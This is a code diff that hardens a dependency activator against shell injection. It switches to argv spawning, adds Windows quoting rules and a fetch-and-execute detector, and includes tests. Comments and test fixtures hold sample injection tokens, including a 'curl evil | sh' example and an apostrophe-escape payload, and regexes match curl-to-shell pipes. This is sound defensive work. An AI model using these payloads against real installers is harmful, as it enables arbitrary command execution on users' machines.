   writeFileSync(manifestPath, JSON.stringify(out, null, 2) + "\n");
   recordInstall(out);
@@ -349,7 +356,7 @@ if (!DRY) {
   // where it always is: whoever gets here already has the engine, because this
   // script lives inside it.
   console.log("  re-indexing registries...");
-  const nrvBin = join(HOME, ".local", "bin", "nrv");
+  const nrvBin = join(homedir(), ".local", "bin", "nrv");
   const indexer = join(import.meta.dir, "..", "..", "harness", "scripts", "index.ts");
   const reindex = existsSync(nrvBin)
     ? spawnSync(nrvBin, ["index"], { stdio: "inherit" })

--- a/skills/harness/scripts/run-track.ts
+++ b/skills/harness/scripts/run-track.ts
@@ -176,9 +176,19 @@ try {
       process.stdout.write(`no open runs${root ? ` em ${root}` : ""}\n`);
       process.exit(0);
     }
+    // The `run_id` column is the point of the listing: `beat` and `close` take
+    // that id and nothing else. It used to print `project_id` alone — a
+    // directory basename — so the one command that discovers open runs handed
+    // over an identifier the two commands that act on them answer `not found`
+    // to, and the id had to be read out of the SQLite file by hand. Both are
+    // here now, labelled, because they are different things and neither
+    // substitutes for the other.
+    process.stdout.write(
+      `${"state".padEnd(10)} ${"run_id".padEnd(24)} ${"project".padEnd(24)} target  lease→\n`,
+    );
     for (const r of rows) {
       process.stdout.write(
-        `${r.state.padEnd(10)} ${String(r.project_id ?? "?").padEnd(28)} ${String(r.target_kind ?? "?")}/${String(r.target_slug ?? "?")}  lease→${String(r.lease_expires_at ?? "").slice(11, 19)}\n`,
+        `${r.state.padEnd(10)} ${r.run_id.padEnd(24)} ${String(r.project_id ?? "?").padEnd(24)} ${String(r.target_kind ?? "?")}/${String(r.target_slug ?? "?")}  lease→${String(r.lease_expires_at ?? "").slice(11, 19)}\n`,
       );
     }
     process.exit(0);

--- a/skills/harness/tests/run-ledger-project-scope.test.ts
+++ b/skills/harness/tests/run-ledger-project-scope.test.ts
@@ -376,6 +376,32 @@ describe("nrv run-track — the door a session actually touches", () => {
     expect(b.stdout).not.toContain("squad/brand");
   });
 
+  test("list prints the id that close takes, and the round trip works", () => {
+    // The discovery command has to hand over the identifier the acting commands
+    // consume. It printed `project_id` — a directory basename — and
+    // `nrv run-track close <what list showed>` answered `not found`, so the
+    // run_id had to be read out of the SQLite file by hand to close two runs.
+    const outputs = path.join(TMP, "rt-list-outputs");
+    fs.mkdirSync(outputs, { recursive: true });
+    const opened = runTrack(PROJ_A, ["open", "--target", "listable", "--kind", "squad", "--outputs", outputs]);
+    expect(opened.status).toBe(0);
+    const runId = opened.stdout.trim();
+    expect(runId).toMatch(/^run-/);
+
+    const listed = runTrack(PROJ_A, ["list"]);
+    expect(listed.status).toBe(0);
+    const line = listed.stdout.split("\n").find(l => l.includes("squad/listable"));
+    expect(line).toBeDefined();
+    const columns = line!.trim().split(/\s+/);
+    expect(columns[1]).toBe(runId);
+    // project_id did not go away — it is a second, labelled column.
+    expect(listed.stdout).toContain("project");
+
+    const closed = runTrack(PROJ_A, ["close", columns[1], "--state", "delivered"]);
+    expect(closed.status).toBe(0);
+    expect(getRun(openLedger(db), runId)!.state).toBe("delivered");
+  });
+
   test("closing another project's run is refused, and names the owner", () => {
     const before = getRun(openLedger(db), "ct-b")!;
     const r = runTrack(PROJ_A, ["close", "ct-b", "--state", "delivered"]);

--- a/skills/harness/tests/verify-install-hooks.test.ts
+++ b/skills/harness/tests/verify-install-hooks.test.ts
@@ -37,14 +37,16 @@ function home(): string {
 /**
  * A home the child actually believes in, on every platform.
  *
- * `installer.ts` resolves its roots lazily from `NIRVANA_HOME` / `SQUADS_DIR`,
- * so redirecting those is enough for it. `install-content.ts` does not: it
- * reads `os.homedir()` once, at module scope, and joins `squads`,
- * `businesses` and `.nirvana/packs` onto it. `os.homedir()` follows `$HOME` on
- * macOS and Linux and `%USERPROFILE%` on Windows — so a test that sets only
- * `HOME` redirects the overlay on two platforms out of three and silently
- * writes into the real profile on the third. That is what turned this file red
- * on the Windows runner and nowhere else.
+ * `installer.ts` and `install-content.ts` both resolve their roots lazily from
+ * `NIRVANA_HOME` / `SQUADS_DIR` / `BUSINESSES_DIR` / `DNA_LIBRARY`, so
+ * redirecting those is enough. The overlay did NOT, until 0.10.x: it read
+ * `os.homedir()` once, at module scope, and joined `squads`, `businesses` and
+ * `.nirvana/packs` onto it. `os.homedir()` follows `$HOME` on macOS and Linux
+ * and `%USERPROFILE%` on Windows — so a test that sets only `HOME` redirected
+ * the overlay on two platforms out of three and silently wrote into the real
+ * profile on the third. That is what turned this file red on the Windows runner
+ * and nowhere else. Both halves are still set here: a child that falls back to
+ * `homedir()` for anything must land in this root too, never in the real one.
  */
 function homeEnv(root: string): Record<string, string> {
   const drive = /^([A-Za-z]:)(.*)$/.exec(root);

--- a/skills/squads/SKILL.md
+++ b/skills/squads/SKILL.md
@@ -193,7 +193,7 @@ Activation is end-to-end: validate, install everything declared in `<squad>/depe
 
 - `*squad activate {name}` — full activation (delegates to `agents/squad-activator.md` persona)
 - `*squad activate {name} --dry-run` — preview only, no installs run
-- `*squad activate {name} --confirm-heavy` — auto-accept downloads >1 GB
+- `*squad activate {name} --confirm-heavy` — auto-accept downloads >1 GB, sudo installs, and installers that fetch a remote script and execute it
 - `*squad status {name}` — show activation state from `~/.claude/squads-state/<name>/activated.json`
 - `*squad deactivate {name}` — clear state file (does NOT uninstall packages)
 
@@ -206,7 +206,8 @@ steps below are the AUTHORING flow, run from inside a squad being built. A
 user who just installed a pack activates through the CLI instead:
 `nrv activate <slug>`, or `nrv activate --all --only-declared` to walk the
 whole library one squad at a time (add `--dry-run` to see the plan,
-`--confirm-heavy` to accept large downloads and sudo installs). Activation is
+`--confirm-heavy` to accept large downloads, sudo installs, and installers
+that pipe a remote script into a shell). Activation is
 advisory — nothing blocks a dispatch — but a squad whose task shells out to
 ffmpeg or epubcheck fails MID-RUN when the tool is absent, after the dispatch
 is already paid for. `nrv doctor` warns when a declared tool is missing.

--- a/skills/squads/lib/activator.js
+++ b/skills/squads/lib/activator.js
@@ -74,6 +74,100 @@ function runCmd(cmd, opts = {}) {
   }
 }
 
+// A package list is DATA. `runCmd` builds a shell string, which is right for
+// `system[].install.<platform>` — a squad author writes `brew install ffmpeg`
+// there on purpose, behind the sudo / heavy-download consent gate — and wrong
+// for `node:` and `python:`, whose entries are package tokens. Joined into a
+// shell line, `- "left-pad; curl https://x/y.sh | sh"` stopped being a package
+// name and became a second command, run by `nrv activate` with the user's own
+// privileges. Quoting is not the fix either: the pip branch wrapped tokens in
+// single quotes and an apostrophe inside a token still closed them.
+//
+// runArgv passes an argv ARRAY with no shell, so on macOS and Linux a token can
+// only ever be one argument. Windows needs one more step, and leaving it to the
+// runtime is what makes it dangerous.
+//
+// `pip`, `uv`, `curl` and `huggingface-cli` are real executables on Windows, so
+// those paths spawn directly, with no shell anywhere. `npm`, `pnpm` and `yarn`
+// ship as `.cmd` shims that no runtime starts without a shell — and the runtime
+// will NOT quote the token for us. libuv quotes an argument only when it holds a
+// space, tab or double quote:
+//
+//     if (NULL == wcspbrk(source, L" \t\"")) { /* No quotation needed */ }
+//                                                (libuv, src/win/process.c)
+//
+// `@remotion/cli@^4.0.0` — a real spec, shipped today in creative-studio and
+// genesis-circle — has none of the three, so it reaches cmd.exe raw, cmd eats
+// `^` as its own escape character, and npm silently installs
+// `@remotion/cli@4.0.0`. A different range, no error, nobody told. Swap the
+// payload and the same hole runs `calc`: `left-pad&calc`.
+//
+// So the command line is built HERE, with every argument quoted, and handed to
+// the runtime's shell path, which on Windows is `cmd.exe /d /s /c "<line>"`.
+// `/s` strips the outer pair the runtime adds and leaves ours standing, so cmd
+// sees each token quoted and `^`, `&`, `|`, `<`, `>`, `(`, `)` are data inside
+// it. Four characters survive no quoting cmd.exe understands and are refused
+// instead: `"` closes the quoting, `%` expands inside quotes, `!` expands when
+// delayed expansion is on, and a newline ends the line. No spec in the shipped
+// packs carries any of them; every metacharacter that appears in a real one
+// (`^`, `>`, `|`, `[`, `]`) passes through as data.
+const WINDOWS_UNQUOTABLE = /["%!\r\n]/;
+
+/**
+ * The cmd.exe line for an argv, or the token that cannot be quoted into one.
+ * Exported for test: this is the whole Windows decision, and the spawn it feeds
+ * cannot be exercised from a POSIX runner.
+ */
+function windowsShellPlan(argv) {
+  for (const a of argv) {
+    const m = WINDOWS_UNQUOTABLE.exec(String(a));
+    if (m) return { ok: false, char: m[0], token: String(a) };
+  }
+  // The program name is left bare: a leading quote is what makes cmd apply its
+  // own stripping rules to the rest of the line. Every argument after it is
+  // quoted unconditionally, so the rule holds for tokens and flags alike.
+  return { ok: true, line: [argv[0], ...argv.slice(1).map(a => `"${a}"`)].join(' ') };
+}
+
+function runArgv(argv, opts = {}) {
+  const verbose = process.env.MAESTRO_ACTIVATOR_VERBOSE === '1';
+  const common = {
+    stdio: verbose ? 'inherit' : 'pipe',
+    timeout: opts.timeoutMs || 600000,
+    cwd: opts.cwd || undefined,
+    env: { ...process.env, ...(opts.env || {}) },
+    windowsHide: true,
+  };
+  let r;
+  // `windowsShim: true` marks the callers whose program is a `.cmd` on Windows.
+  // Everyone else spawns argv directly on every platform.
+  if (PLATFORM === 'win32' && opts.windowsShim) {
+    const plan = windowsShellPlan(argv);
+    if (!plan.ok) {
+      return { ok: false, error:
+        `refused on Windows: the token ${JSON.stringify(plan.token)} contains ${JSON.stringify(plan.char)}, ` +
+        `which survives no quoting cmd.exe understands, and ${argv[0]} can only be started through cmd.exe there. ` +
+        `Every other character, ^ and > and | included, is passed as data. ` +
+        `Drop that one from the spec, or run the install yourself and re-activate.` };
+    }
+    r = spawnSync(plan.line, { ...common, shell: true });
+  } else {
+    r = spawnSync(argv[0], argv.slice(1), { ...common, shell: false });
+  }
+  if (r.error) return { ok: false, error: r.error.message };
+  if (r.signal) return { ok: false, error: `${argv[0]} killed by ${r.signal}`, code: null, stderr: r.stderr ? r.stderr.toString() : null };
+  if (r.status !== 0) {
+    return { ok: false, error: `${argv[0]} exited ${r.status}`, code: r.status, stderr: r.stderr ? r.stderr.toString() : null };
+  }
+  return { ok: true, output: r.stdout ? r.stdout.toString() : '' };
+}
+
+// Human-readable rendering of an argv, for `--dry-run` output and error text
+// ONLY. Nothing executes this string — that is the point of runArgv.
+function displayCmd(argv) {
+  return argv.map(a => (/[^\w@.\-+=/:]/.test(a) ? `'${a.replace(/'/g, "'\\''")}'` : a)).join(' ');
+}
+
 function ensureDir(p) {
   if (!fs.existsSync(p)) fs.mkdirSync(p, { recursive: true });
 }
@@ -147,6 +241,75 @@ function allChecksPass(norm) {
   return norm.checks.every(c => checkCmd(c).ok);
 }
 
+// Fetch-and-execute detection for `system[].install.<platform>`.
+//
+// That field IS a shell line by design — `brew install ffmpeg` is what a squad
+// author should write there — and the consent gate in front of it only ever
+// matched `sudo`. So `curl -fsSL https://bun.sh/install | bash`, which ships
+// today in brandcraft and grok-studio-nirvana, ran on the buyer's machine with
+// no prompt at all: a third party's script, fetched and executed, because
+// someone asked to install dependencies. The exit-code contract already
+// promised 2 for "heavy installs", so this fills a promise rather than
+// inventing one.
+//
+// The line the detector draws is fetch-and-EXECUTE. Downloading is not
+// executing: `curl -o model.bin <url>`, `brew install`, `apt-get install` and
+// `winget install` stay untouched, because a gate that fires on ordinary
+// installs is a gate everyone learns to pass with --confirm-heavy without
+// reading it.
+const FETCHERS = String.raw`curl|wget|iwr|irm|Invoke-WebRequest|Invoke-RestMethod`;
+const INTERPRETERS = String.raw`bash|sh|zsh|dash|ksh|fish|python3?|perl|ruby|iex|Invoke-Expression`;
+// Anything that runs a file, for the two-step shape: the interpreters above plus
+// the ones that only ever appear as stage two (`node`, `powershell`, `msiexec`,
+// `installer`) and a bare `./thing`.
+const RUNNERS = String.raw`bash|sh|zsh|dash|ksh|fish|python3?|node|perl|ruby|powershell|pwsh|msiexec|installer|iex|Invoke-Expression`;
+// Command position: start of line, or after `;`, `&`, `&&`, `|`, `||`, `(` or a
+// newline, with any `sudo -E` / `env -i` / `exec` prefix skipped. Without this
+// anchor, a PATH like `/tmp/sh` would read as an invocation of `sh`.
+const CMD_POSITION = String.raw`(?:^|[;&|(\n])\s*(?:(?:sudo|env|command|exec)(?:\s+-{1,2}\S+)*\s+)*`;
+const URL_IN_COMMAND = /https?:\/\/[^\s'"|)>]+/i;
+const FETCHER_PRESENT = new RegExp(String.raw`\b(?:${FETCHERS})\b`, 'i');
+
+const DIRECT_FORMS = [
+  // curl … | bash · wget -qO- … | sh · irm … | iex · … | sudo -E bash -
+  // The prefix group matters: `| sudo -E bash -` is the nodesource shape, and a
+  // detector that only allowed a bare `sudo` would wave it through.
+  new RegExp(String.raw`\b(?:${FETCHERS})\b[\s\S]*?\|\s*(?:(?:sudo|env|command|exec)(?:\s+-{1,2}\S+)*\s+)*(${INTERPRETERS})\b`, 'i'),
+  // bash <(curl …) · sh <(wget …)
+  new RegExp(String.raw`\b(${INTERPRETERS})\b[^\n]*?<\(\s*(?:${FETCHERS})\b`, 'i'),
+  // sh -c "$(curl …)" · eval "$(curl …)" · eval `curl …`
+  new RegExp(String.raw`\b(${INTERPRETERS}|eval)\b[^\n]*?(?:\$\(|` + '`' + String.raw`)\s*(?:${FETCHERS})\b`, 'i'),
+];
+
+// The two-step shape, which is the COMMON one in the wild: download an installer,
+// then run it. `ebook-maestro-nirvana` ships it today in genesis-circle and
+// publishing-knowledge — curl a zip, unzip it, `sh` the file that came out — and
+// no pipe or substitution appears anywhere in it. The risk is identical to
+// `curl | bash`: if the host is compromised, the buyer runs whatever it served.
+const TWO_STAGE_RUN = new RegExp(CMD_POSITION + String.raw`(?:(${RUNNERS})\b|(\.{1,2}\/\S+))`, 'i');
+
+/**
+ * `{ url, shell, form }` when the command downloads something and runs it, else
+ * null. `form` is the confidence, and it reaches the buyer: `direct` is a pipe
+ * or a substitution and is not arguable; `two_stage` is a fetch and a runner in
+ * the same command, which is a strong signal rather than a proof.
+ *
+ * Exported for test: the corpus it has to judge is the 232 install commands in
+ * the shipped packs, and judging them must not mean running them.
+ */
+function fetchAndExecute(cmd) {
+  const text = String(cmd || '');
+  const url = URL_IN_COMMAND.exec(text);
+  for (const form of DIRECT_FORMS) {
+    const m = form.exec(text);
+    if (m) return { url: url ? url[0] : null, shell: m[1], form: 'direct' };
+  }
+  if (!url || !FETCHER_PRESENT.test(text)) return null;
+  const run = TWO_STAGE_RUN.exec(text);
+  if (!run) return null;
+  return { url: url[0], shell: run[1] || run[2], form: 'two_stage' };
+}
+
 function installSystem(dep, dryRun, confirmHeavy) {
   // Bare prereq string (e.g. "ffmpeg >= 6.0", "node >= 20"): we can only verify
   // presence — auto-installing a system tool needs a package-manager mapping we
@@ -179,18 +342,39 @@ function installSystem(dep, dryRun, confirmHeavy) {
   // sudo binary, and root does not need it). Running unprivileged, a sudo
   // command requires --confirm-heavy — the same consent gate as large
   // downloads — otherwise it is a confirmation_required item (exit 2).
+  //
+  // Fetching a remote script and executing it goes through the SAME gate, for
+  // the same reason: it is the machine doing something the person who typed
+  // `nrv activate` did not see coming. Both reasons are reported together, and
+  // the item carries the exact command, because that is the only thing the
+  // buyer can actually decide on.
   let effectiveCmd = installCmd;
   const needsSudo = /(^|\s|&&|\|\||;)\s*sudo\s+/.test(installCmd);
   const isRoot = typeof process.getuid === 'function' && process.getuid() === 0;
+  const fetchExec = fetchAndExecute(installCmd);
   if (needsSudo && isRoot) {
     effectiveCmd = installCmd.replace(/(^|\s|&&|\|\||;)(\s*)sudo\s+/g, '$1$2');
-  } else if (needsSudo && !confirmHeavy) {
+  }
+  const reasons = [];
+  if (needsSudo && !isRoot) reasons.push('runs as root through sudo');
+  if (fetchExec) {
+    reasons.push(fetchExec.form === 'direct'
+      ? `downloads ${fetchExec.url || 'a remote address'} and executes it with ${fetchExec.shell}`
+      : `downloads ${fetchExec.url} and then runs ${fetchExec.shell} in the same command — two steps rather than a pipe, so read it before accepting`);
+  }
+  if (reasons.length > 0 && !confirmHeavy) {
     return {
       name: dep.name,
       status: 'confirmation_required',
       kind: 'system',
       cmd: installCmd,
-      reason: 'Install command needs sudo. Re-run with --confirm-heavy to accept (or install it yourself and re-activate).',
+      needs_sudo: needsSudo && !isRoot,
+      fetches: fetchExec ? fetchExec.url : null,
+      executes_with: fetchExec ? fetchExec.shell : null,
+      execution_form: fetchExec ? fetchExec.form : null,
+      reason: `Consent needed before this runs: it ${reasons.join(', and it ')}.\n`
+        + `  ${installCmd}\n`
+        + `  Re-run with --confirm-heavy to accept it, or install it yourself and re-activate.`,
     };
   }
   const installResult = runCmd(effectiveCmd);
@@ -214,18 +398,17 @@ function installPython(spec, dryRun) {
   const manager = norm.manager === 'uv' ? 'uv' : 'pip';
   const target = expandPath((!Array.isArray(spec) && (spec.target_dir || (spec.use_squad_venv ? '.venv' : null))) || null);
 
-  let cmd;
+  let argv;
   if (manager === 'uv') {
-    cmd = `uv pip install ${tokens.map(p => `'${p}'`).join(' ')}`;
+    argv = ['uv', 'pip', 'install', ...tokens];
   } else {
     // pip vs pip3 fallback (macOS system python often only ships pip3); --user
     // when there is no explicit target dir/venv so it works on managed pythons.
     const pipBin = checkCmd('pip --version').ok ? 'pip' : (checkCmd('pip3 --version').ok ? 'pip3' : 'pip');
-    const userFlag = target ? '' : ' --user';
-    cmd = `${pipBin} install${userFlag} ${tokens.map(p => `'${p}'`).join(' ')}`;
+    argv = [pipBin, 'install', ...(target ? [] : ['--user']), ...tokens];
   }
-  if (dryRun) return { status: 'would_install', kind: 'python', manager, cmd };
-  const r = runCmd(cmd, { cwd: target });
+  if (dryRun) return { status: 'would_install', kind: 'python', manager, cmd: displayCmd(argv), argv };
+  const r = runArgv(argv, { cwd: target });
   return {
     status: r.ok ? 'installed' : 'install_failed',
     kind: 'python',
@@ -243,14 +426,14 @@ function installNode(spec, dryRun, squadDir) {
   if (allChecksPass(norm)) return { status: 'already_present', kind: 'node', manager: norm.manager, global: norm.global, packages: tokens };
   const manager = norm.manager || 'npm';
   const g = norm.global;
-  const cmd = manager === 'pnpm' ? `pnpm add${g ? ' -g' : ''} ${tokens.join(' ')}`
-            : manager === 'yarn' ? `yarn ${g ? 'global add' : 'add'} ${tokens.join(' ')}`
-            : `npm install${g ? ' -g' : ''} ${tokens.join(' ')}`;
-  if (dryRun) return { status: 'would_install', kind: 'node', manager, global: g, cmd };
+  const argv = manager === 'pnpm' ? ['pnpm', 'add', ...(g ? ['-g'] : []), ...tokens]
+             : manager === 'yarn' ? ['yarn', ...(g ? ['global', 'add'] : ['add']), ...tokens]
+             : ['npm', 'install', ...(g ? ['-g'] : []), ...tokens];
+  if (dryRun) return { status: 'would_install', kind: 'node', manager, global: g, cmd: displayCmd(argv), argv };
   // Local installs default to the squad's OWN dir, so npm never pollutes the
   // ~/squads root with a stray node_modules/package-lock. An explicit spec.cwd
   // (object form) still wins; global installs (-g) ignore cwd.
-  const r = runCmd(cmd, { cwd: g ? undefined : (expandPath(!Array.isArray(spec) ? spec.cwd : null) || squadDir) });
+  const r = runArgv(argv, { windowsShim: true, cwd: g ? undefined : (expandPath(!Array.isArray(spec) ? spec.cwd : null) || squadDir) });
   return { status: r.ok ? 'installed' : 'install_failed', kind: 'node', manager, global: g, packages: tokens, error: r.ok ? null : r.error };
 }
 
@@ -291,10 +474,13 @@ function installService(svc, dryRun) {
     if (h.ok) return { name: svc.name, status: 'already_running', kind: 'service' };
   }
 
-  // 2. Clone if missing
+  // 2. Clone if missing. `repo` and `install_dir` are manifest DATA, like the
+  // package tokens and the model url — argv, never a shell line. (`install_cmd`
+  // below is the opposite: a shell line the squad author wrote on purpose.)
   if (svc.repo && !alreadyCloned) {
-    if (dryRun) return { name: svc.name, status: 'would_clone', kind: 'service', cmd: `git clone ${svc.repo} ${installDir}` };
-    const r = runCmd(`git clone ${svc.repo} ${installDir}`);
+    const argv = ['git', 'clone', String(svc.repo), ...(installDir ? [installDir] : [])];
+    if (dryRun) return { name: svc.name, status: 'would_clone', kind: 'service', cmd: displayCmd(argv), argv };
+    const r = runArgv(argv);
     if (!r.ok) return { name: svc.name, status: 'clone_failed', kind: 'service', error: r.error };
   }
 
@@ -326,11 +512,13 @@ function installCustomNodes(nodes, dryRun) {
       results.push({ name: node.name, status: 'already_present', kind: 'custom_node' });
       continue;
     }
+    // Same rule as services: `repo` is data out of the manifest.
+    const argv = ['git', 'clone', String(node.repo), dst];
     if (dryRun) {
-      results.push({ name: node.name, status: 'would_clone', kind: 'custom_node', cmd: `git clone ${node.repo} ${dst}` });
+      results.push({ name: node.name, status: 'would_clone', kind: 'custom_node', cmd: displayCmd(argv), argv });
       continue;
     }
-    const r = runCmd(`git clone ${node.repo} ${dst}`);
+    const r = runArgv(argv);
     results.push({ name: node.name, status: r.ok ? 'installed' : 'clone_failed', kind: 'custom_node', error: r.ok ? null : r.error });
   }
   return { status: 'done', kind: 'custom_nodes', items: results };
@@ -360,21 +548,26 @@ function installModels(models, dryRun, opts = {}) {
       });
       continue;
     }
-    let cmd;
+    // Same field-is-data rule as `node:` and `python:`: `repo`, `url`, `filename`
+    // and `install_to` come out of dependencies.yaml, so a shell line here would
+    // let `url: "https://x/m.bin; curl evil | sh"` run its own command. argv also
+    // fixes the quieter half of the old bug — an install path with a space used
+    // to split into two arguments.
+    let argv;
     if (m.source === 'huggingface') {
-      cmd = `huggingface-cli download ${m.repo} ${m.filename || ''} --local-dir ${dst}`.trim();
+      argv = ['huggingface-cli', 'download', String(m.repo), ...(m.filename ? [String(m.filename)] : []), '--local-dir', dst];
     } else if (m.source === 'url') {
-      cmd = `curl -L -o ${fileTarget} ${m.url}`;
+      argv = ['curl', '-L', '-o', fileTarget, String(m.url)];
     } else {
       results.push({ name: m.name, status: 'unknown_source', kind: 'model', source: m.source });
       continue;
     }
     if (dryRun) {
-      results.push({ name: m.name, status: 'would_download', kind: 'model', cmd });
+      results.push({ name: m.name, status: 'would_download', kind: 'model', cmd: displayCmd(argv), argv });
       continue;
     }
     ensureDir(dst);
-    const r = runCmd(cmd, { timeoutMs: 7200000 });
+    const r = runArgv(argv, { timeoutMs: 7200000 });
     results.push({ name: m.name, status: r.ok ? 'downloaded' : 'download_failed', kind: 'model', error: r.ok ? null : r.error });
   }
   return { status: 'done', kind: 'models', items: results };
@@ -654,7 +847,9 @@ function deactivate(slug) {
   return { ok: true, slug, deactivated_at: new Date().toISOString() };
 }
 
-module.exports = { activate, status, deactivate };
+// windowsCmdMetachar is exported for its own test: it is the whole Windows
+// decision, and the spawn it guards cannot be exercised from a POSIX runner.
+module.exports = { activate, status, deactivate, _windowsShellPlan: windowsShellPlan, _fetchAndExecute: fetchAndExecute };
 
 // CLI — exit codes follow the contract documented in scripts/activate-squad.sh:
 //   0 = ok / activated

--- a/skills/squads/tests/activator-package-token-injection.test.ts
+++ b/skills/squads/tests/activator-package-token-injection.test.ts
@@ -1,0 +1,481 @@
+// activator-package-token-injection.test.ts — a package name is data, not a command.
+//
+// `dependencies.yaml` has two kinds of field, and the activator used to run
+// both the same way. `system[].install.<platform>` IS a shell line by design:
+// the squad author writes `brew install ffmpeg` there, and sudo or a heavy
+// download stops at a consent gate before anything runs. `node:` and `python:`
+// are package LISTS — the author writes names, the reader expects names — and
+// they were joined into a shell string too. So a manifest carrying
+//
+//     node:
+//       - "left-pad; touch /tmp/pwned"
+//
+// executed a second command during `nrv activate`, with the user's privileges
+// and no gate in front of it. The pip branch wrapped each token in single
+// quotes, which only moved the door: an apostrophe inside the token closes them.
+//
+// The node and python paths now run an argv array with no shell, so a token can
+// only ever be one argument. These tests prove the failure mode is gone by
+// looking at what the package manager was actually called with, and at whether
+// the injected second command left its mark on disk.
+
+import { describe, expect, test } from "bun:test";
+import { existsSync, mkdirSync, mkdtempSync, readFileSync, rmSync, writeFileSync } from "node:fs";
+import { spawnSync } from "node:child_process";
+import { createRequire } from "node:module";
+import { tmpdir } from "node:os";
+import { delimiter, join } from "node:path";
+
+const REPO = join(import.meta.dir, "..", "..", "..");
+const ACTIVATOR = join(REPO, "skills", "squads", "lib", "activator.js");
+const POSIX = process.platform !== "win32";
+type ShellPlan = { ok: true; line: string } | { ok: false; char: string; token: string };
+const { _windowsShellPlan, _fetchAndExecute } = createRequire(import.meta.url)(ACTIVATOR) as {
+  _windowsShellPlan: (argv: string[]) => ShellPlan;
+  _fetchAndExecute: (cmd: string) => { url: string | null; shell: string; form: string } | null;
+};
+
+interface Fixture { root: string; squadDir: string; binDir: string; }
+
+/** A squad whose only content is the dependency manifest under test. */
+function fixture(deps: string): Fixture {
+  const root = mkdtempSync(join(tmpdir(), "activator-injection-"));
+  const squadDir = join(root, "squads", "token-squad");
+  const binDir = join(root, "bin");
+  mkdirSync(squadDir, { recursive: true });
+  mkdirSync(binDir, { recursive: true });
+  writeFileSync(join(squadDir, "squad.yaml"), 'name: token-squad\nversion: "1.0.0"\nprotocol: "5.0"\ndescription: test\n');
+  writeFileSync(join(squadDir, "dependencies.yaml"), deps);
+  return { root, squadDir, binDir };
+}
+
+/**
+ * A stand-in package manager that installs nothing and writes down exactly how
+ * it was called. One TAB-separated line per invocation is what tells a shell
+ * split (`install`, `left-pad`) apart from an argv pass (`install`,
+ * `left-pad; touch …`) — the whole difference this fix is about.
+ */
+function fakeManager(f: Fixture, name: string, log: string): void {
+  const bin = join(f.binDir, name);
+  writeFileSync(bin, [
+    "#!/bin/sh",
+    `printf 'CALL' >> ${JSON.stringify(log)}`,
+    `for a in "$@"; do printf '\\t%s' "$a" >> ${JSON.stringify(log)}; done`,
+    `printf '\\n' >> ${JSON.stringify(log)}`,
+    "exit 0",
+    "",
+  ].join("\n"), { mode: 0o755 });
+}
+
+function calls(log: string): string[][] {
+  if (!existsSync(log)) return [];
+  return readFileSync(log, "utf8")
+    .split("\n")
+    .filter(l => l.startsWith("CALL"))
+    .map(l => l.split("\t").slice(1));
+}
+
+function activate(f: Fixture, flags: string[] = []): { status: number | null; stdout: string; stderr: string } {
+  const r = spawnSync(process.execPath, [ACTIVATOR, "activate", "token-squad", ...flags], {
+    encoding: "utf8",
+    env: {
+      ...process.env,
+      NIRVANA_SKILLS_DIR: join(REPO, "skills"),
+      NIRVANA_RESOLVED_SQUAD_PATH: f.squadDir,
+      NIRVANA_STATE_DIR: join(f.root, "state"),
+      PATH: `${f.binDir}${delimiter}${process.env.PATH ?? ""}`,
+    },
+  });
+  return { status: r.status, stdout: r.stdout ?? "", stderr: r.stderr ?? "" };
+}
+
+describe("a node package token cannot become a second command", () => {
+  test.skipIf(!POSIX)("`;` inside a token stays inside the argument npm receives", () => {
+    const f = fixture("");
+    const sentinel = join(f.root, "pwned");
+    const log = join(f.root, "npm-calls.log");
+    const token = `left-pad; touch ${sentinel}`;
+    writeFileSync(join(f.squadDir, "dependencies.yaml"), `node:\n  - ${JSON.stringify(token)}\n`);
+    fakeManager(f, "npm", log);
+    try {
+      const r = activate(f);
+      expect(r.status).toBe(0);
+
+      // The second command never ran: `touch` was never a command at all.
+      expect(existsSync(sentinel)).toBe(false);
+
+      // And npm was called once, with the whole token as ONE argument. Under
+      // the old shell string this reads ["install", "left-pad"], with `touch`
+      // executed separately by the shell.
+      expect(calls(log)).toEqual([["install", token]]);
+    } finally {
+      rmSync(f.root, { recursive: true, force: true });
+    }
+  }, 30_000);
+});
+
+describe("a python package token cannot escape the quoting either", () => {
+  test.skipIf(!POSIX)("an apostrophe inside a token does not open a shell", () => {
+    const f = fixture("");
+    const sentinel = join(f.root, "pwned-py");
+    const log = join(f.root, "pip-calls.log");
+    // No spaces on purpose: the pip branch strips whitespace from a token, so a
+    // payload that needs spaces would be defused by accident rather than by the
+    // fix. `>` redirection needs none. Under the old `'${token}'` wrapping this
+    // closed the quote, ran the redirection, and created the file.
+    const token = `left-pad';>${sentinel};echo'`;
+    writeFileSync(join(f.squadDir, "dependencies.yaml"), `python:\n  - ${JSON.stringify(token)}\n`);
+    fakeManager(f, "pip", log);
+    try {
+      const r = activate(f);
+      expect(r.status).toBe(0);
+      expect(existsSync(sentinel)).toBe(false);
+
+      // `pip --version` is the probe that picks pip over pip3; the install is
+      // the call that matters, and it carries the token whole.
+      const seen = calls(log);
+      expect(seen.at(-1)).toEqual(["install", "--user", token]);
+      expect(seen.filter(c => c[0] === "install").length).toBe(1);
+    } finally {
+      rmSync(f.root, { recursive: true, force: true });
+    }
+  }, 30_000);
+});
+
+describe("the plan says which fields are argv and which are a shell line", () => {
+  // Runs everywhere, including Windows: --dry-run executes nothing, so this
+  // asserts the shape of the decision rather than the effect of running it.
+  test("node and python plan an argv; system[].install stays a shell string by design", () => {
+    const nodeToken = "left-pad && echo pwned";
+    const pyToken = "requests;echo";
+    const f = fixture([
+      "system:",
+      "  - name: fake-tool-xyz",
+      '    check: "command -v fake-tool-xyz"',
+      "    install:",
+      '      darwin: "brew install fake-tool-xyz"',
+      '      linux: "apt-get install -y fake-tool-xyz"',
+      '      win32: "choco install -y fake-tool-xyz"',
+      "node:",
+      `  - ${JSON.stringify(nodeToken)}`,
+      "python:",
+      "  manager: uv",
+      "  packages:",
+      `    - ${JSON.stringify(pyToken)}`,
+      "",
+    ].join("\n"));
+    try {
+      const r = activate(f, ["--dry-run"]);
+      expect(r.status).toBe(0);
+      const j = JSON.parse(r.stdout);
+
+      expect(j.steps.node.argv).toEqual(["npm", "install", nodeToken]);
+      expect(j.steps.python.argv).toEqual(["uv", "pip", "install", pyToken]);
+
+      // The system entry is the deliberate exception: the author wrote a shell
+      // line, the consent gate reads it, and it keeps being one. A future
+      // refactor that "fixes" this field too would break squads on purpose.
+      const sys = j.steps.system[0];
+      expect(sys.status).toBe("would_install");
+      expect(typeof sys.cmd).toBe("string");
+      expect(sys.argv).toBeUndefined();
+    } finally {
+      rmSync(f.root, { recursive: true, force: true });
+    }
+  }, 30_000);
+});
+
